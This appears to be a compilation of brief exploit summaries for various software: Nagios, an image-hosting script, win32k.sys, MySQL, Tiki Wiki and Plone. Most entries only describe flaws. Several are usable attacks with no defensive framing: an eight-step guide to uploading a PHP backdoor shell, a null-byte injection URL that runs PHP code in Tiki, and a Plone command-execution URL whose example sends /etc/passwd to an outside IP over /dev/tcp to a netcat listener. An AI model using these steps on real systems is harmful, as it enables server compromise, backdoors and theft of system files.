A buffer overflow vulnerability was discovered in the Nagios Plugin 'check_ups' which can be exploited by an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused by a boundary error when handling user-supplied input. By supplying a specially crafted argument to the '-u' option, an attacker can cause a stack-based buffer overflow and gain control of the execution flow of the application.
This exploit allows hackers to upload a PHP backdoor into the "/pictures/" directory via the use of Live HTTP Headers (Firefox Addon). Tools Needed: Live HTTP Headers, Backdoor Shell. Step 1: Locate the upload form on the index page. Step 2: Rename your shell to shell.php.jpg and start capturing data with Live HTTP Headers. Step 3: Enter tags for the image (can be anything). Step 4: Replay the data with Live HTTP Headers. Step 5: Change [Content-Disposition: form-data; name="image1"; filename="shell.php.jpg"\r\n] to [Content-Disposition: form-data; name="image1"; filename="shell.php"\r\n]. Step 6: Locate the pictures directory: www.site.tld/imagehostingscript/pictures/ (usually). Step 7: Find the PHP file, which has a random hex name ending in .php (it should look like 321879194bc8ff2843bf7b63a666f665.php). Step 8: Navigate to the backdoor at www.site.tld/imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php
Unauthorized users can download arbitrary files from the server using this exploit. The bug is in config.php, but it is reachable from another file. The PoC involves setting up a MySQL database, creating a table with a specific structure, adding a row to the database, and calling the script with the database parameters and the id of the file to download.
A buffer overflow vulnerability exists in the GdiDrawStream function of win32k.sys when handling a specially crafted HTML page. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.
The validateUser.php script is vulnerable to SQL injection. An attacker can send a malicious request to the validateUser.php script with a crafted username parameter, which will allow the attacker to execute arbitrary SQL queries.
This exploit is a directory traversal vulnerability which allows an attacker to delete files and directories outside of the intended directory. The exploit is triggered by creating a directory named 'trigger_alt' and a subdirectory named '....' in the root directory of the system. The attacker then uses the SHFileOperation function to delete the 'trigger_alt' directory, which in turn deletes the '....' directory and any other files or directories outside of the intended directory.
This exploit is a buffer overflow vulnerability in MySQL 5.5.8 on Windows. It allows an attacker to send a specially crafted packet to the MySQL server, which will cause a null pointer dereference and crash the server. The exploit is triggered by sending two specially crafted packets to the MySQL server: the first packet contains a null byte followed by a 4-byte integer, and the second packet contains a specially crafted string. The crash occurs when the server attempts to process the second packet.
There are a few file upload vulnerabilities in the administrative interfaces of these applications that are unprotected and allow anyone to exploit them via CSRF.
The vulnerable code is located in /lib/wiki-plugins/wikiplugin_snarf.php: input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent execution of arbitrary PHP code using the 'e' modifier in a call to preg_replace() at line 172. But this check can be bypassed with a null byte injection, by requesting a URL like this: http://<hostname>/tiki-8.2/snarf_ajax.php?url=1&regexres=phpinfo()&regex=//e%00/. Tiki's internal filters remove all null bytes from user input, but for some strange reason this does not happen within admin sessions. So, successful exploitation of this vulnerability requires a user account with administration rights and 'PluginSnarf' to be enabled (it is not enabled by default).
You can execute any command on the remote Plone server with the following request if the server is Unix/Linux based (Note: the output of the command is not returned to you): http://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command to run>. For example, to listen for a connection, the attacker can use the command 'nc -l 4040' and then, against the victim, visit http://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040